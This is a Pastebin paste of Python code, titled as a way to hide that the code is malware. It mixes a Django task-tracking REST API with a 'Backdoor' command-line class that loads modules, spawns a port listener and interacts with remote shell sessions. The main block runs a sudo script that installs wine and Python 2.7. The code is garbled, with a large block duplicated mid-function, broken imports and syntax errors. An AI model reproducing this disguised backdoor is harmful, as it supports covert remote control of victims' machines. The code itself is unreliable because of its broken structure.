API tools faq
paste
Advertisement
xGHOSTSECx

Not Gonna Name It Something Incriminating.Gonna Hide The Fact It Is FuckWare

xGHOSTSECx
Dec 25th, 2023
119
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.46 KB | None | 0 0
raw download clone embed print report
  1. python
  2. import os
  3. import cmd
  4. import math
  5. import shlex
  6. import importlib
  7. import inspect
  8. import sys
  9. import socket
  10. import time
  11. import pexpect
  12. import traceback
  13. from colorama import *
  14. from six.moves import input
  15. from .option import *
  16. from .connection import Connection
  17. from django.db import models
  18. from django.contrib.auth.models import User
  19. from rest_framework import serializers, viewsets, routers
  20. from django.urls import path, include
  21. from rest_framework.response import Response
  22. from django.http import HttpResponse
  23. django.views.decorators.csrf import csrf_exempt
  24. import subprocess
  25. # Django Models (models.py)
  26. class Task(models.Model):
  27. title = models.CharField(max_length = 100)
  28. description = models.TextField()
  29. created_by = models.ForeignKey(User, on_delete = models.CASCADE)
  30. assigned_to = models.ForeignKey(User, on_delete = models.CASCADE, related_name = 'assigned_tasks')
  31. status = models.CharField(max_length = 20, choices = [('TODO', 'To Do'), ('IN_PROGRESS', 'In Progress'), ('DONE', 'Done')])
  32. priority = models.CharField(max_length = 20, choices = [('LOW', 'Low'), ('MEDIUM', 'Medium'), ('HIGH', 'High')])
  33. due_date = models.DateTimeField(null = True, blank = True)
  34. class Comment(models.Model):
  35. task = models.ForeignKey(Task, on_delete = models.CASCADE)
  36. text = models.TextField()
  37. posted_by = models.ForeignKey(User, on_delete = models.CASCADE)
  38. created_at = models.DateTimeField(auto_now_add = True)
  39. # Django Rest Framework Serializers (serializers.py)
  40. class TaskSerializer(serializers.ModelSerializer):
  41. class Meta:
  42. model = Task
  43. fields = '__all__'
  44. class CommentSerializer(serializers.ModelSerializer):
  45. class Meta:
  46. model = Comment
  47. fields = '__all__'
  48. # Django Views (views.py)
  49. class TaskViewSet(viewsets.ModelViewSet):
  50. queryset = Task.objects.all()
  51. serializer_class = TaskSerializer
  52. class CommentViewSet(viewsets.ModelViewSet):
  53. queryset = Comment.objects.all()
  54. serializer_class = CommentSerializer
  55. # REST API URL Configuration (urls.py)
  56. router = routers.DefaultRouter()
  57. router.register(r'tasks', TaskViewSet)
  58. router.register(r'comments', CommentViewSet)
  59. class Backdoor(cmd.Cmd):
  60. def __init__(self, core):
  61. super(Backdoor, self).__init__()
  62. self.options = {}
  63. self.core = core
  64. self.target = core.curtarget
  65. self.modules = {}
  66. self.allow_modules = True
  67. self.help_text = None
  68. self.listening = 0
  69. self.intro = ""
  70. def check_added(self, name):
  71. for m, opts in self.modules.items():
  72. if m.name.lower() == name.lower():
  73. return m
  74. return None
  75. def complete_add(self, text, line, begin_index, end_index):
  76. return [item for item in self.walk("modules/", echo = False) if item.startswith(text)]
  77. def do_add(self, line):
  78. if self.allow_modules:
  79. for m in line.split():
  80. mod = self.check_added(m)
  81. if mod != None:
  82. print(INFO + mod.name + " module already added.")
  83. continue
  84. try:
  85. mod = importlib.import_module("modules." + m)
  86. clsmembers = inspect.getmembers(sys.modules["modules."+m], inspect.isclass)
  87. try:
  88. mod = [c for c in clsmembers if c[1].__module__ == "modules."+m][0][1](self.core.curtarget, self, self.core)
  89. self.modules[mod] = mod.options
  90. print(GOOD + mod.name + " module added.")
  91. except Exception as e:
  92. print(BAD + "An unexpected error occurred.")
  93. except Exception as e:
  94. print(BAD + "No module \""+m+"\" available.")
  95. else :
  96. print(BAD + "Modules disabled by this backdoor.")
  97. def complete_set(self, text, line, begin_index, end_index):
  98. line = line.rsplit(" ")[1]
  99. segment = line.split(".")
  100. if len(segment) == 1:
  101. return [item for item in ([m.name.lower() for m in self.modules.keys()] + ["target"] + self.options.keys()) if item.startswith(text)]
  102. if len(segment) == 2:
  103. return [(segment[0] + "." + item) for item in self.get_by_name(segment[0]).options.keys() if item.startswith(text.replace(segment[0]+".",""))]
  104. def set_target(self, target):
  105. self.options['target'] = target
  106. def set_option(self, option, value):
  107. if option in self.options.keys():
  108. self.options[option] = value
  109. return True
  110. else :
  111. return False
  112. def do_exploit(self):
  113. return False
  114. def listen(self, passw = "none", prompt = "some"):
  115. self.child = pexpect.spawn("python listen.py " + str(self.get_value("port")) + " " + str(passw) + " " + str(prompt))
  116. time.sleep(.25)
  117. self.core.curtarget.sessions.append(Connection(self.intro, self.child, len(self.core.curtarget.sessions)))
  118. print(INFO + "Session " + str(len(self.core.curtarget.sessions)) + " created.")
  119. def do_sessions(self, args):
  120. if args == "" or args == "--help" or args == "-h":
  121. print("Use sessions -l to list and sessions -i <num> to interact with a shell")
  122. if args == "" or args == "--list" or args == "-l":
  123. i = 1
  124. for session in self.core.curtarget.sessions:
  125. print(str(i))
  126. print(session)
  127. i += 1
  128. if "-i" in args or "--interact" in args:
  129. self.core.curtarget.sessions[int(args.split(" ")[1]) - 1].interact()
  130. print(args)
  131. def do_show(self, args):
  132. if args == "options":
  133. self.do_help(args)
  134. elif args == "modules":
  135. self.mods()
  136. else :
  137. print(BAD + "Unknown option %s", args)
  138. def do_set(self, args):
  139. args = shlex.split(args)
  140. bad_opt = BAD + "Unknown option %s" % args[0]
  141. if len(args) == 2 and args[0] in self.options:
  142. if args[0] == "port":
  143. if int(args[1]) > 0 and int(args[1]) < 1024:
  144. print(INFO + "Sudo is required for this port.")
  145. elif int(args[1]) > 1023 and int(args[1]) < 65536:
  146. pass
  147. else :
  148. print(BAD + "This is not a valid port.")
  149. return
  150. self.options[args[0].lower()].value = args[1]
  151. print(GOOD + "%s => %s" % (args[0], args[1]))
  152. elif args[0] == "target":
  153. self.core.do_set(" ".join(args))
  154. elif len(args) != 2:
  155. print(BAD + "Usage: \"set <OPTION> <VALUE>\"")
  156. elif "." in args[0] and self.check_by_name(args[0].split(".")[0]):
  157. mod = args[0].split(".")[0]
  158. option = args[0].split(".")[1]
  159. module = self.get_by_name(mod)
  160. if module != None and option in module.options.keys():
  161. module.options[option].value = args[1]
  162. print(GOOD + "%s => %s" % (args[0], args[1]))
  163. else :
  164. print(bad_opt)
  165. else :
  166. print(bad_opt)
  167. def get_value(self, name):
  168. if name in self.options:
  169. return self.options[name].value
  170. else :
  171. return None
  172. def check_by django.views.decorators.csrf import csrf_exempt
  173. import subprocess
  174. # Django Models (models.py)
  175. class Task(models.Model):
  176. title = models.CharField(max_length = 100)
  177. description = models.TextField()
  178. created_by = models.ForeignKey(User, on_delete = models.CASCADE)
  179. assigned_to = models.ForeignKey(User, on_delete = models.CASCADE, related_name = 'assigned_tasks')
  180. status = models.CharField(max_length = 20, choices = [('TODO', 'To Do'), ('IN_PROGRESS', 'In Progress'), ('DONE', 'Done')])
  181. priority = models.CharField(max_length = 20, choices = [('LOW', 'Low'), ('MEDIUM', 'Medium'), ('HIGH', 'High')])
  182. due_date = models.DateTimeField(null = True, blank = True)
  183. class Comment(models.Model):
  184. task = models.ForeignKey(Task, on_delete = models.CASCADE)
  185. text = models.TextField()
  186. posted_by = models.ForeignKey(User, on_delete = models.CASCADE)
  187. created_at = models.DateTimeField(auto_now_add = True)
  188. # Django Rest Framework Serializers (serializers.py)
  189. class TaskSerializer(serializers.ModelSerializer):
  190. class Meta:
  191. model = Task
  192. fields = '__all__'
  193. class CommentSerializer(serializers.ModelSerializer):
  194. class Meta:
  195. model = Comment
  196. fields = '__all__'
  197. # Django Views (views.py)
  198. class TaskViewSet(viewsets.ModelViewSet):
  199. queryset = Task.objects.all()
  200. serializer_class = TaskSerializer
  201. class CommentViewSet(viewsets.ModelViewSet):
  202. queryset = Comment.objects.all()
  203. serializer_class = CommentSerializer
  204. # REST API URL Configuration (urls.py)
  205. router = routers.DefaultRouter()
  206. router.register(r'tasks', TaskViewSet)
  207. router.register(r'comments', CommentViewSet)
  208. class Backdoor(cmd.Cmd):
  209. def __init__(self, core):
  210. super(Backdoor, self).__init__()
  211. self.options = {}
  212. self.core = core
  213. self.target = core.curtarget
  214. self.modules = {}
  215. self.allow_modules = True
  216. self.help_text = None
  217. self.listening = 0
  218. self.intro = ""
  219. def check_added(self, name):
  220. for m, opts in self.modules.items():
  221. if m.name.lower() == name.lower():
  222. return m
  223. return None
  224. def complete_add(self, text, line, begin_index, end_index):
  225. return [item for item in self.walk("modules/", echo = False) if item.startswith(text)]
  226. def do_add(self, line):
  227. if self.allow_modules:
  228. for m in line.split():
  229. mod = self.check_added(m)
  230. if mod != None:
  231. print(INFO + mod.name + " module already added.")
  232. continue
  233. try:
  234. mod = importlib.import_module("modules." + m)
  235. clsmembers = inspect.getmembers(sys.modules["modules."+m], inspect.isclass)
  236. try:
  237. mod = [c for c in clsmembers if c[1].__module__ == "modules."+m][0][1](self.core.curtarget, self, self.core)
  238. self.modules[mod] = mod.options
  239. print(GOOD + mod.name + " module added.")
  240. except Exception as e:
  241. print(BAD + "An unexpected error occurred.")
  242. except Exception as e:
  243. print(BAD + "No module \""+m+"\" available.")
  244. else :
  245. print(BAD + "Modules disabled by this backdoor.")
  246. def complete_set(self, text, line, begin_index, end_index):
  247. line = line.rsplit(" ")[1]
  248. segment = line.split(".")
  249. if len(segment) == 1:
  250. return [item for item in ([m.name.lower() for m in self.modules.keys()] + ["target"] + self.options.keys()) if item.startswith(text)]
  251. if len(segment) == 2:
  252. return [(segment[0] + "." + item) for item in self.get_by_name(segment[0]).options.keys() if item.startswith(text.replace(segment[0]+".",""))]
  253. def set_target(self, target):
  254. self.options['target'] = target
  255. def set_option(self, option, value):
  256. if option in self.options.keys():
  257. self.options[option] = value
  258. return True
  259. else :
  260. return False
  261. def do_exploit(self):
  262. return False
  263. def listen(self, passw = "none", prompt = "some"):
  264. self.child = pexpect.spawn("python listen.py " + str(self.get_value("port")) + " " + str(passw) + " " + str(prompt))
  265. time.sleep(.25)
  266. self.core.curtarget.sessions.append(Connection(self.intro, self.child, len(self.core.curtarget.sessions)))
  267. print(INFO + "Session " + str(len(self.core.curtarget.sessions)) + " created.")
  268. def do_sessions(self, args):
  269. if args == "" or args == "--help" or args == "-h":
  270. print("Use sessions -l to list and sessions -i <num> to interact with a shell")
  271. if args == "" or args == "--list" or args == "-l":
  272. i = 1
  273. for session in self.core.curtarget.sessions:
  274. print(str(i))
  275. print(session)
  276. i += 1
  277. if "-i" in args or "--interact" in args:
  278. self.core.curtarget.sessions[int(args.split(" ")[1]) - 1].interact()
  279. print(args)
  280. def do_show(self, args):
  281. if args == "options":
  282. self.do_help(args)
  283. elif args == "modules":
  284. self.mods()
  285. else :
  286. print(BAD + "Unknown option %s", args)
  287. def do_set(self, args):
  288. args = shlex.split(args)
  289. bad_opt = BAD + "Unknown option %s" % args[0]
  290. if len(args) == 2 and args[0] in self.options:
  291. if args[0] == "port":
  292. if int(args[1]) > 0 and int(args[1]) < 1024:
  293. print(INFO + "Sudo is required for this port.")
  294. elif int(args[1]) > 1023 and int(args[1]) < 65536:
  295. pass
  296. else :
  297. print(BAD + "This is not a valid port.")
  298. return
  299. self.options[args[0].lower()].value = args[1]
  300. print(GOOD + "%s => %s" % (args[0], args[1]))
  301. elif args[0] == "target":
  302. self.core.do_set(" ".join(args))
  303. elif len(args) != 2:
  304. print(BAD + "Usage: \"set <OPTION> <VALUE>\"")
  305. elif "." in args[0] and self.check_by_name(args[0].split(".")[0]):
  306. mod = args[0].split(".")[0]
  307. option = args[0].split(".")[1]
  308. module = self.get_by_name(mod)
  309. if module != None and option in module.options.keys():
  310. module.options[option].value = args[1]
  311. print(GOOD + "%s => %s" % (args[0], args[1]))
  312. else :
  313. print(bad_opt)
  314. else :
  315. print(bad_opt)
  316. def get_value(self, name):
  317. if name in self.options:
  318. return self.options[name].value
  319. else :
  320. return None
  321. def check_by_name(self, name):
  322. for mod in self.modules:
  323. if name.lower() == mod.name.lower():
  324. return True
  325. return False
  326. def do_EOF(self, line):
  327. print("")
  328. return True
  329. def emptyline(self):
  330. return
  331. def precmd(self, line):
  332. self._hist += [line.strip()]
  333. return line
  334. def do_history(self, args):
  335. print(self._hist)
  336. def default(self, line):
  337. self.core.onecmd(line)
  338. def do_quit(self, args):
  339. print("Exiting")
  340. exit()
  341. def print_help(self, options):
  342. if options == {}:
  343. return
  344. vals = [str(o.value) for o in options.values()]
  345. l = int(math.ceil(max(map(len, vals / 10.0)) * 10
  346. print(("{0:<15} {1:<%s} {2:<30}" % str(l)).format("Option","Value", "Description"))
  347. print("="*(l+45))
  348. for name, opt in options.items():
  349. print(("{0:<15} {1:<%s} {2:<30}" % str(l)).format(opt.name, opt.value, opt.description))
  350. def do_help(self, args):
  351. if self.help_text is not None and self.help_text != "":
  352. print(self.help_text)
  353. print("Backdoor options: ")
  354. print("")
  355. self.print_help(self.options)
  356. if self.allow_modules:
  357. print("")
  358. if self.modules != {}:
  359. for mod, opts in self.modules.items():
  360. print("\n%s module options: \n" % mod.name)
  361. self.print_help(mod.options)
  362. def get_by_name(self, name):
  363. for mod in self.modules.keys():
  364. if mod.name.lower() == name.lower():
  365. return mod
  366. return None
  367. def do_remove(self, line):
  368. if self.allow_modules:
  369. for m in line.split():
  370. mod = self.get_by_name(m)
  371. if mod is not None:
  372. self.modules.pop(mod, None)
  373. print(GOOD + "Removed %s module." % m)
  374. else :
  375. print(BAD + "No module \""+m+"\" enabled")
  376. else :
  377. print(BAD + "Modules disabled by this backdoor.")
  378. def preloop(self):
  379. cmd.Cmd.preloop(self)
  380. self._hist = []
  381. self._locals = {}
  382. self._globals = {}
  383. def walk(self,folder,echo = True):
  384. ms = []
  385. if echo:
  386. print(INFO + "Modules:")
  387. for root, dirs, files in os.walk(folder):
  388. del dirs[:] # walk down only one level
  389. path = root.split('/')
  390. for file in files:
  391. if file[-3:] == ".py":
  392. ms.append(str(file).replace(".py", ""))
  393. if echo:
  394. print((len(path)*' ') + "-", str(file).replace(".py", ""))
  395. return ms
  396. def run_bash_script(self, script):
  397. try:
  398. result = subprocess.run(script, shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE, universal_newlines = True)
  399. return result.stdout, result.stderr
  400. except Exception as e:
  401. return str(e), None
  402. if __name__ == "__main__":
  403. try:
  404. # Replace the following command with your Bash script logic
  405. bash_script = '''
  406. sudo dpkg --add-architecture i386 && sudo apt-get update && sudo apt-get -yq install wine32
  407. wget -q https://www.python.org/ftp/python/2.7.14/python-2.7.14.msi -O /tmp/python-2.7.msi
  408. wine msiexec /q /i /tmp/python-2.7.msi
  409. wine C:/Python27/Scripts/pip.exe install -r requirements.txt
  410. rm /tmp/python-2.7.msi
  411. '''
  412. backdoor = Backdoor(core)
  413. stdout, stderr = backdoor.run_bash_script(bash_script)
  414. if stdout:
  415. print(stdout)
  416. if stderr:
  417. print(stderr)
  418. except Exception as e:
  419. print(str(e))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!